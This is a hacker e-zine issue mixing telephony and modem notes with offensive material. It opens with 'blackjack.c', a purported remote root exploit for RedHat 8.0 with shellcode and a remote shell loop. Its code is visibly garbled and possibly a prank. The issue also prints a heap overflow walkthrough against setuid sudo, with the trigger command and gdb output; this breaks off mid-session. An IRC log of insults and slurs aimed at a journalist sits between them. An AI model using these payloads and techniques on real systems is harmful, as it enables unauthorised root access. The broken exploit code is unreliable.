¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ::ÆÆÆ[www.blackhat.cx]ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ:: ____________ --)-----------|____________| ,' ,' -)------======== ,' ____ ,' `. `. ,' ,'__ ,' `. `. ,' ,' `. `._,'_______,'________________[ vol.1 <=> issue#3 ] __________.____ _____ _________ ____ __.__________.___ _______ ___________ \______ \ | / _ \ \_ ___ \| |/ _______ /| |\ \ \_ _____/ | | _/ | / /_\ \/ \ \/| < / / | |/ | \ | __)_ | | \ |___/ | \___| | \__/ /__| | \_| \ |______ ________ ____|__ /\______ _____|__ __________\___\____|_______________/ \/ \/ \/ \/ \/ @logicfive.net .-"" |=========================== ______________ |--------------------------------- "-...l_______________________ | |' || |_]__ | [`-.|__________ll_| |----- www.blackhat.cx -------- ,' ,' `. `. | (c) The BlackHat Project | ,' ,' `. ____`. ------------------------------- -)---------======== `. `.____`. __ `. `. / /\ `.________`. _ / / \ --)-------------|___________| ,-- / /\/ / \ -, | ,/ / \/ / |----> the table of contents ,---| \ \ / |---------------------------------------------------------------, | `-- \ \ / -----' "If we knew what it was we were doing, \_ | \ it would not be called research, would it?" - Albert Einstein| | `\`*_' / | \__________________________________________________________________________' | |:0x01 - Welcome.................................................................STAFF | > Introduction | > About BlackHat |:0x02 - 0x69....................................................................STAFF | > CODE OF THE ISSUE! | > BMCW joins #phrack@EFNET | > #ETCPUB 10 0x** |:0x03 - Transmission Networks....................................................ofer | > Digital Telephony Transmission |:0x04 - Communication (Basic)....................................................ofer | > Basic Terminology |:0x05 - Exploiting a sudo heap overflow.......................................fc&MaXX | > Introduction | > I. The Vulnerable local binary | > II. Discussion of strategies | > III. Exploiting this contrived example | > MaXX doing sudo |:0x06 - Basic about format string.................................................lkm | > Introduction | > I. What do you need? | > II. Format functions! | > III. Exploit it! |:0x07 - | `-------------------------------------------------------------------------------------' ::ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ[www.blackhat.cx]ÆÆÆ:: ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ #=> 0x01 Welcome ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ #=[ Introduction. ]=---> Blackhat Community has always been more or less underground. That is just normal if you think the nature of the scene. Misunderstood and mysterious group of people is often judged in world-wide media. Blackhat Magazine or E-zine is trying to bring the community near to common people and it tries to break the common stereotypes made of "hackers". Every blackhat is not evil, they just dont want to live in this many ways cruel society. For them cyberspace and coding is the way to make the difference. Dont judge understand. #=[ About BlackHat. ]=---> Bzine is for people. From blackhat scene to all those who are interested about ethics and security related articles. "White or Greyhat, it just don't matter Sucker dive for your life when my shotgun scatters" -Anonymous @ http://phrack.efnet.ru ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ #=> 0x02 0x69 ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ :> CODE OF THE ISSUE Ok i gotta show you one hella funny code :) you gotta be fucked up in the head to write this /* blackjack.c * RedHat 8.0 remote exploit (default install) * DO NOT DISTRIBUTE! PRIV8!! * by: d|skette * * will open a shell with the privileges of the root * * 2002/10/02 * // upload by d3m3nt3 // #0x333 * * special thanks to xdfx & yhouma for donating a bit of his elite debugging skillz. */ #include #include #include #include #include #include #include #include #include #include #include #include #define XP_OFFSET 0xbfffe074 /* use this offset unless bruteforcing required */ unsigned long int xp_off = XP_OFFSET; /* you don't have to modify this :) i hope :) */ #define XP_NETWORK_FD 12 #define XP_NETWORK_OFFSET 0x00000101 /* fixed relative network socket offset */ #define XP_SHELLCODE_OFFSET 0x00000150 /* fixed relative retaddr offset */ #define XP_DIFF 0x0000000a /* 14 bytes after XP_OFFSET starts the shellcode */ #define XP_SH2_FD1 0x00000032 #define XP_SH2_FD2 0x0000001a #define XP_SH2_FD3 0x00000023 #define GREEN "\E[32m" #define BOLD "\E[1m" #define NORMAL "\E[m" #define RED "\E[31m" /* local functions */ void usage (void); void shell (int socket); unsigned long int net_resolve (char *host); int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec); /* because the buffer is rather small (256 bytes), we use a minimalistic * read() shellcode to increase the chances to hit a correct offet */ unsigned char shellcode1[] = "\x777\x68\x6f\x69\x73\x3a\x2f\x2f\x61\x20\x62\x20\x31\x20\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 30 byte read() shellcode by scut */ "\x33\xd2\x33\xc0\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x80\xc2" "\x10\x03\xca\xc1\xc2\x04\xb0\x03\x33\xdb\xb3\x0c\xcd\x80" /* ^^ network fd */ "\x82\xe0\xff\xbf" /* return address */ "\x0d\x0a"; unsigned char shellcode2[]= "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9" "\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0" "\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd" "\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e" "\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d" "\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c" "\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d" "\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07" "\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b" "\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30" "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67"; void usage (void) { printf (**************************************************"\n" "**************************************************" NORMAL "\n\n"); exit (EXIT_FAILURE); } int main (int argc, char **argv) { int socket; char *server; struct sockaddr_in sa; unsigned short int port_dest; unsigned char *retaddr_ptr; unsigned long int offset; unsigned char *stack = NULL; if (argc < 3) usage (); printf (brute forcing the offset" NORMAL "\n"); if (argc == 4) { long int xp_add = 0; if (sscanf (argv[3], "%ld", &xp_add) != 1) { usage (); } xp_off += xp_add; } printf ("Looks like you had a good hand\n", xp_off); server = argv[1]; port_dest = atoi (argv[2]); /* do the offset */ retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET; offset = xp_off + XP_DIFF; *retaddr_ptr = (offset & 0x000000ff) >> 0; *(retaddr_ptr + 1) = (offset & 0x0000ff00) >> 8; *(retaddr_ptr + 2) = (offset & 0x00ff0000) >> 16; *(retaddr_ptr + 3) = (offset & 0xff000000) >> 24; *(shellcode1 + XP_NETWORK_OFFSET) = (unsigned char) XP_NETWORK_FD; *(shellcode2 + XP_SH2_FD1) = (unsigned char) XP_NETWORK_FD; *(shellcode2 + XP_SH2_FD2) = (unsigned char) XP_NETWORK_FD; *(shellcode2 + XP_SH2_FD3) = (unsigned char) XP_NETWORK_FD; fflush (stdout); socket = net_connect (&sa, server, port_dest, 22); if (socket <= 0) { printf (" " RED BOLD "failed" NORMAL ".\n"); perror ("net_connect"); exit (EXIT_FAILURE); } printf (" " GREEN BOLD "connected" NORMAL "\n"); /* send minimalistic read() shellcode */ printf (" " GREEN "-" NORMAL " sending first shellcode...\n"); write (socket, shellcode1, strlen (shellcode1)); sleep (1); /* now send the real shellcode :-) */ printf (" " GREEN "-" NORMAL " sending second shellcode...\n"); write (socket, shellcode2, strlen (shellcode2)); printf (" " GREEN "-" NORMAL " try to execve("/bin/sh"n\n"); shell (socket); close (socket); exit (EXIT_SUCCESS); } unsigned long int net_resolve (char *host) { long i; struct hostent *he; i = inet_addr (host); if (i == -1) { he = gethostbyname (host); if (he == NULL) { return (0); } else { return (*(unsigned long *) he->h_addr); } } return (i); } /* original version by typo, modified by scut */ void shell (int socket) { char io_buf[1024]; int n; fd_set fds; while (1) { FD_SET (0, &fds); FD_SET (socket, &fds); select (socket + 1, &fds, NULL, NULL, NULL); if (FD_ISSET (0, &fds)) { n = read (0, io_buf, sizeof (io_buf)); if (n <= 0) return; write (socket, io_buf, n); } if (FD_ISSET (socket, &fds)) { n = read (socket, io_buf, sizeof (io_buf)); if (n <= 0) return; write (1, io_buf, n); } } } int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec) { int n, len, error, flags; int fd; struct timeval tv; fd_set rset, wset; /* first allocate a socket */ cs->sin_family = AF_INET; cs->sin_port = htons (port); fd = socket (cs->sin_family, SOCK_STREAM, 0); if (fd == -1) return (-1); cs->sin_addr.s_addr = net_resolve (server); if (cs->sin_addr.s_addr == 0) { close (fd); return (-1); } flags = fcntl (fd, F_GETFL, 0); if (flags == -1) { close (fd); return (-1); } n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); if (n == -1) { close (fd); return (-1); } error = 0; n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); if (n < 0) { if (errno != EINPROGRESS) { close (fd); return (-1); } } if (n == 0) goto done; FD_ZERO(&rset); FD_ZERO(&wset); FD_SET(fd, &rset); FD_SET(fd, &wset); tv.tv_sec = sec; tv.tv_usec = 0; n = select(fd + 1, &rset, &wset, NULL, &tv); if (n == 0) { close(fd); errno = ETIMEDOUT; return (-1); } if (n == -1) return (-1); if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { len = sizeof(error); if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { errno = ETIMEDOUT; return (-1); } if (error == 0) { goto done; } else { errno = error; return (-1); } } } else return (-1); done: n = fcntl(fd, F_SETFL, flags); if (n == -1) return (-1); return (fd); } :> BMCW joins #phrack@EFNET [18:55] ::: bmcw [brian@unknown1.ne.client2.attbi.com] has joined #phrack [18:57] hah [18:57] brian you finally wrote something intresting.. who'd you steal the idea from? [18:57] thanks morgan [18:57] no theft involved [18:58] someone needs to update this: http://phrack.efnet.ru/pr/pr3.txt [18:58] i can live with the fabricated IRC logs [18:58] but the story has been restored [18:59] hah.. i dont have access.. sorry [18:59] thanks to the vigilance of #phrack, of course [18:59] so why was it changed? [18:59] ::: insurgent [~datakit@64.238.115.118] has joined #phrack [18:59] wired.com installed a new publishing system. [18:59] messed up lots of stories [19:00] ::: [signoff] g463 (Read error: 54 (Connection reset by peer)) [19:00] no conspiracy by whitehats [19:00] seemed like it was intentional.. just as what sections were cut out.. [19:00] but i just read that text i dunno if it was just that or more [19:00] i just wish they had cut the section about gay hitler being 16 :) [19:02] to have (1986-2002) ? [19:02] heh [19:02] ::: zirek [zirek@mainframe.blackhat.cx] has joined #phrack [19:03] proof that #phrack has too much power: http://www.googlism.com/index.htm?ism=brian+mcwilliams&type=1 [19:04] hah.. what a pointless website [19:04] ::: logika [~error@cw06.A1.srv.t-online.de] has joined #phrack [19:04] lesse ... googlism on morgan, what's your last name again? [19:05] brian mcwilliams is a fukwit to show up on irc and believe whatever [19:05] sh1t3 we b3 f33din him [19:05] nothing about me on googlism [19:05] haha [19:05] but i agree.. if #phrack can smear the good name of the great brian mcwilliams.. they have gone way to far over board [19:05] thats just way over board [19:06] fortunately, most people can't read that h4x0r-speak [19:06] so my reputation remains unsullied [19:07] ::: [signoff] b0ils (Ping timeout: 302 seconds) [19:07] well.. unchanged maybe [19:08] yo morgan [19:08] hey, look [19:08] it's my favorite reporter [19:08] hi brian [19:08] hello [19:08] hi shiftee [19:09] are you in the TrueSecure database? http://online.wsj.com/article/0,,SB1036551876833581308,00.html?mod=technology_featured_stories_hs [19:09] gotta pay for wsj.com.. gimmie your login/passwd [19:10] not a subscriber [19:10] hmm ... hang on [19:10] if its a database of nogoodnicks.. im sure shiftee is in it though [19:11] i'm cookied on that site and forgot my password long ago. [19:12] quoting from the article: [19:12] well buy me one [19:12] The Brain is a smaller but more elegant tool. It takes what TruSecure's moles have learned about more than 3,500 individual hackers and 800 organized groups and displays their shifting relationships and alliances graphically [19:12] see, this is why that Tupac project needs to be resurrected [19:13] http://jambajuice.8m.com/ [19:14] here's the WSJ article at Yahoo: [19:14] http://sg.biz.yahoo.com/021031/15/349kf.html [19:14] this is why you should stick to just regurgitating facts.. not thinking.. [19:15] ::: harq [harq@81-86-186-196.dsl.pipex.com] has joined #phrack [19:15] It was technology for mining TruSecure's deep knowledge of the hacker world and brute-force searches of the public Internet. [19:15] lol [19:15] im scared [19:15] eckis, they are mining usenet! [19:15] mining attrition.org defaced archive [19:15] OH SHIT WE'VE CAUGHT [RAGA] [19:17] [RaFa] [19:17] he's the beadest of the bad [19:17] rafa only does accidental defacements [19:17] ::: [signoff] maym (Client Exiting) [19:17] oh [19:17] [RaFa] [19:18] i have nightmares about rafa defacing me.. i wake up tied up.. with an ugly brazilian over me.. writing on my face with a magic marker... [19:18] he haunts my very existance.. [19:19] ::: ___eug___ [~eug@206.244.157.9] has joined #phrack [19:19] haha [19:19] ::: drhaze_ [drhaze@ghetto.decepti.co.nz] has joined #phrack [19:19] omg morgan, what a mess: http://www.googlism.com/index.htm?ism=morgan&type=1 [19:20] ya.. thats terrible [19:21] maybe you can get a court injunction against googlism? [19:21] gonna have to have a little talk with mafiaboy.. ill get them taken care of [19:21] "morgan is on the top row with a pipe in his mouth" [19:21] i mean, really [19:21] ::: [signoff] __eug____ (Ping timeout: 300 seconds) [19:21] morgan is beginning to believe that no one will ever want him [19:22] :( [19:22] thats not true shiftee.. there is always the fbi.. [19:22] i could make them want me [19:22] :( [19:22] eckis is a former president of richfield oil company and vice chairman of the board of atlantic richfield company [19:22] and drater [19:22] drater only goes for vampires [19:25] this is a good one: http://www.googlism.com/index.htm?ism=gobbles&type=1 [19:25] phrack is a bad [19:25] gobbles is a whitehat group [19:26] gobbles is a talking turkey who makes fun of blackhats [19:26] hehe [19:26] phrack is now registered with the library of congress [19:26] ;)) [19:27] http://www.googlism.com/index.htm?ism=project+mayhem&type=1 [19:27] bmcw, is it pure coincidence that wired's new publishing system just happened to mess up all parts of the article that indicated that ~el8 may be a group of talented people? [19:28] = wait3r is gone.. driving [BX-MsgLog On] [19:28] http://www.patrick.fm/boobies/boobies.php?text=brian+mcwilliams [19:28] yes [19:28] hah. whatever [19:29] ::: nwk [nwk@uberl33t.ghettosmurf.no] has joined #phrack [19:29] shiftee, seriously [19:29] ::: coideloko [coideloko@200.205.240.89] has parted #phrack [19:29] my editors didn't do it [19:29] "project mayhem is killed" [19:29] unless some whitehats broke into the system and changed the story [19:29] ::: [signoff] Bloodmask [19:29] morgan, that's kewl [19:30] ::: chelle [ninja@squirrel.kay4tea.org] has joined #phrack [19:30] hi [19:30] sorta like this: http://www.yugop.com/ver3/stuff/03/fla.html [19:30] kewl? what is this 1990 on some bbs with doors games? [19:31] ninja squirrels everywhere these days :/ [19:31] 01:34PM it's so lame in there [19:31] ::: heff [~bob@adsl-67-114-129-20.dsl.sntc01.pacbell.net] has joined #phrack [19:31] moogz is @#blackhat [19:31] watch out [19:32] @#blackhat @#whitehat [19:32] UHHHHHHHHHHHH [19:32] watch this [19:32] irc.* [19:32] make your mind up please [19:32] he just wants to be irc cool [19:32] pi channels.. how gay [19:32] look at him.. sitting on like 4 #irc.xxx.com channels [19:32] ::: nickchange [(chelle) -> (swiftlee)] [19:33] don't forget all the +s ones either [19:33] thx [19:33] #dont.fucking./whois.me <- those channels are the epitome of irc cool [19:33] im in it just so you call me gay [19:33] whenever i whois them i feel the sudden urge to apologize [19:33] or catch a harsh beatdown [19:33] haha [19:33] #while.ur.reading.this.whois.im.jacking.your.wallet [19:33] i always check my pocket after reading that [19:33] hah [19:33] heh [19:33] (lkm) Claiming responsibility for the attacks is a shadowy group named el8. Earlier this year, members launched Project Mayhem [19:33] (lkm) wtF? [19:34] shadowy ... oooh! [19:34] im more scared of the project mayhem about to go down by the bush administration [19:35] bmcw, i'd like to see the day you write an article which is based on 100% fact [19:35] (lkm) when did el8 launche Project Mayhem? [19:35] journalism is about money.. not facts [19:36] ::: badpack3t [originalgu@whiznugee.com] has parted #phrack [19:36] ::: [signoff] swiftlee (okbye) [19:36] lkm, ~el8.2 [19:36] shiftee, where can I get some good facts? [19:37] 100% pure variety [19:37] bmcw, no idea. maybe you should just stop writing articles [19:37] shiftee offers private sessions starting at 2.95 a minute [19:37] (lkm) :) [19:37] he'll give you any facts you want [19:37] shiftee runs a phone-sex line? [19:37] i can dcc you morgan-info.txt for 20 bux [19:37] he works for one.. [19:37] has everything you'd ever want to know [19:38] We I would like to know what dumbass decided to stuff a balet for bush.. How much would that cost [19:38] does it have my waste size? [19:38] no [19:38] not many people would want to know that [19:38] ill stuff the ballet for a few dollars a vote [19:39] how is it that theres 3x more people in here than the old #phrack, but even less people talk [19:39] eckis, they're all fbi monitor bots [19:39] eggdrops loaded with carnivore.so [19:40] eggdrop for windows? [19:40] Nah most of them are sence wh0res.. Hoping to be spotted for a Ryan Russel production.. [19:42] ::: [signoff] ___eug___ (Ping timeout: 300 seconds) [19:43] ::: ___eug___ [~eug@206.244.157.9] has joined #phrack [19:45] shiftee, i've got a copy of morgan-info.txt already [19:45] one of my stalkees [19:45] (lkm) bmcw you have any real fans? [19:46] (lkm) that love your work [19:46] lkm [19:46] (lkm) zirek ! [19:46] :) [19:46] :) [19:46] ::: merc- [~mercenary@200-207-92-4.dsl.telesp.net.br] has joined #phrack [19:46] lkm, not even my mom [19:46] (lkm) Thats sad [19:46] 4n4k474. [19:50] http://www.pc-radio.com/leyden.html [19:50] eckis, good find [19:51] ::: pzn [optimist@as.if] has joined #phrack [19:52] hah you gonna sue him? [19:52] ::: pzn [optimist@as.if] has parted #phrack [19:53] how dare someone steal bmcw's ip.. thats like stealing security from snosoft [19:54] that's old. he's changed his ways [19:54] ::: c0al [c0al@ky-owensboro2c-17.owboky.adelphia.net] has joined #phrack [19:54] the register still sux ===============================================================================================> :> #ETCPUB 10 0x** Again i will tell you 10 things about stupid things that #etcpub@IRCnet talk about :) 1) 0x50 How to hack php forums - by _hC 2) 0x45 being a warez whore - ace24 3) 0x53 _SH goes SOHO 4) 0x57 irchost logger in stacheldraht form, written in BASH - Annihilat 5) 0x58 dos tool kenny.c - Mtb 6) 0x59 weekly warez dump - pr0ix 7) 0x60 i like sendmail.org - group ADM 8) 0x65 how el8 owned seiki - _sh 9) 0x88 why "ficken" isnt good password - HcdT 10) 0x95 im still learning C dude - pen ===================================================> ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ #=> 0x03 Transmission Networks. ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ :> Digital Telephony Transmission, * At the beginning this way only circuits (real ones). * Then we moved to virtual circuits using FDM. * Then we moved to TDM (PDH) - PDH: Plesiochronous Digital Hierarchy - Using Multiplexing techonolgy - Standard Digital rates.. Digital Telephony, * T1 1.544 Mb/sec * T2 6.312 Mb/sec * T3 44.736 Mb/sec * E1 2.048 Mb/Sec * E2 8.848 Mb/Sec * E3 34.304 Mb/sec Digital Telephony Transmiision, * Then we moved to SONET / SDH - SDH: Synchronous Digital Hierarchy - Transmission infrastructure for broadband services too (B-ISDN) * STS-1 (STM-0) - 9*90 bytes per 125 usec transmission frame - 51.84Mbps * STS3 (STM-1) - 9*270 bytes.. - 155.52 Mbps * STS-N - 9*90*N bytes - 51.84*N Mbps SONET / SDH Defined rates, STS-1/OC-1 51.84 Mbps STS-3/Oc-3/STM-1 155.52 Mbps STS-12/OC-12STM-4 622.08 Mbps STS-48/OC-48/STM-16 2488.32 Mbps STS-192/OC-192/STM-64 9953.28 Mbps SONET / SDH Technology, * TDM based * SDH Basic frame - 9 "raws"*90 "columns" bytes per 125 usec transmission frame. - 51.84 Mbps - STM-1: 9*90 bytes frame * SDH transmission frame: - Overhead bytes - Payload bytes - A lot of standard VC (Virtual Containers) are defined - Standard mapping and multiplexing * Example: - E1 singal built into a VC-12 SDH containers - 63 * VC-12 mapped and muxed in one STM-1 SONET /SDH Technology, * Usually - rings topology * SDH components: - TM - Terminal Multiplexer - AMD - Add & Drop Multiplexer - CC - Cross Connect * The SDH network is fully synchronized, - Flexibility - synchronization issues * Protection schemes, - Path Protection - Multiplex-Section Protection * A reliable & mature infrastructure for broadband services ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ #=> 0x04 Communication (Basic). ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ :> Basic Terminology .:Modems:. Basic Terminology, Method of fabrication: * Standalone * Adapter Card * Rackmount Card DTE/DCE Interface: * Asynchronous vs. Synchronous * RS-232C, RS-232D, and V.24 Modulation Types: Error Detection & Correction * Parity *Checksum or CRC * HDLC Basic Terminology (cont`) Telephone facility support: * PSTN or leased lines * Half / Full duplex support Enhanced Features: * Multi-Standard compatibility * Command set * Software based (DSP) * Layer 2 * Compression Modem Internal Components (Rx side) Filter and amplifier: * Passes only desired frequencies & amplify them. Equalizer: Recovers original signal * Distortion near pass frequencies * Differential attenuation of frequencies * Frequencies differential delay * Programmable & adaptive * Echo cancellation Demodulator: * Recovers digital information Descranmbler: * Recovers data before scrambling Data Decoder: * Recoversbits from symbols. Modem Internal Components (last..) Moderm modems are implemented by DSP. Its advantages: Faster, More flexible, More accurate, More standards, Embedded FAX, Better Equalizer, Better filtering, Compression, Intelligence. Modulation Methods Basic Formula: * a = A * sin (2*n*f*t+q) "Where", * a: Instantaneous value of voltage at time t * A: Maximum amplitude * f: Frequency * q: Phase Modulation can be based on: * Amplitude chances * Frequency changes * Phase changes * Combinations ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ #=> 0x05 Exploiting a sudo heap overflow ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ :> Introduction I should probably write about a 1000 words of introduction and orientation for you, my dear reader, but i wont. If these two lines, [fc@eurocomptonmachine fc]$ sudo -p h%haaaaaaaa% A Segmentation fault don't clue you in, nothing will. :> I. The Vulnerable local binary Instead of a contrived example, we will use this other contrived example called sudo. Imagine supposedly secure linux distros install this by default, setuid, and consider it augmenting their security. A creative reader is more than likely already imagining the many different ways one can manipulate the heap with this bug and sudo's many options. And let me tell you brother, I had to tweak this thing left and right. I gave up for a week or two, and always came back for more abuse. I dont know any better way to explain this, then to break it down attacker style. WHAT IS THE GOAL??? To corrupt the heap in some way to subvert the process to execute my shellcode. So I played with diff strings, values for flags, sizes, env variables, the kitchen sink, etc... Always coming to a dead end for basically one main reason. The necessary '%' at the end of the prompt string to activate the bug. This was like a big problem. Now that '%' turned the off by five technique into useless garbage. Maybe with another 20 hours of playing I could have used that '0x25' to more advantage but it wasn't happening. The off by five technique requires that the null byte lands on the size part of the chunk. This zeros out the previous in use bit of that size chunk and you control the chunk_free from there. Meaning you control the previous size part of that chunk and it can be two main range of values. But that 0x25 lands on most significant part of previous size part of the chunk and blows that out of the fucking water. I know i dont make sense. Let me show you with gdb... [root@localhost sudo-1.6.3]# ps auxwww | grep sudo ; gdb sudo root 6655 1.0 0.2 1692 660 pts/7 S 22:46 0:00 ./sudo -p h%haaaaaaaaaa% A root 6657 0.0 0.2 1700 592 pts/8 S 22:46 0:00 grep sudo GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT) (gdb) attach 6655 Attaching to program: /home/fc/sudo/sudo-1.6.3/sudo, process 6655 Loaded symbols for /lib/libcrypt.so.1 Loaded symbols for /lib/libc.so.6 Loaded symbols for /lib/ld-linux.so.2 Loaded symbols for /lib/libnss_files.so.2 0x40112d31 in __libc_nanosleep () from /lib/libc.so.6 (gdb) break strcpy Breakpoint 1 at 0x400e0f2a: file ../sysdeps/generic/strcpy.c, line 34. (gdb) cont Continuing. Breakpoint 1, strcpy (dest=0x806055f "", src=0x805dc90 "localhost") at ../sysdeps/generic/strcpy.c:34 34 ../sysdeps/generic/strcpy.c: No such file or directory. in ../sysdeps/generic/strcpy.c (gdb) x/16x 0x8060558 0x8060558: 0xbffffb62 0x00000021 0x4018d1c8 0x4018d1c8 0x8060568: 0x6475732f 0x63662f6f 0xbffffbe4 0xbffffda7 0x8060578: 0xbffffdc6 0x00000049 0x4018d168 0x4018d168 0x8060588: 0xbffffe1c 0xbffffe48 0xbffffe5c 0xbffffe67 (gdb) cont Continuing. Breakpoint 1, strcpy (dest=0x8060568 "%sudo/fcäûÿ¿§ýÿ¿Æýÿ¿I", src=0x805dc90 "localhost") at ../sysdeps/generic/strcpy.c:34 34 in ../sysdeps/generic/strcpy.c (gdb) break chunk_alloc Breakpoint 2 at 0x400daf01: file malloc.c, line 2860. (gdb) cont Continuing. Breakpoint 2, chunk_alloc (ar_ptr=0x40068ec0, nb=3221222848) at malloc.c:2860 2860 malloc.c: No such file or directory. in malloc.c (gdb) x/16x 0x8060558 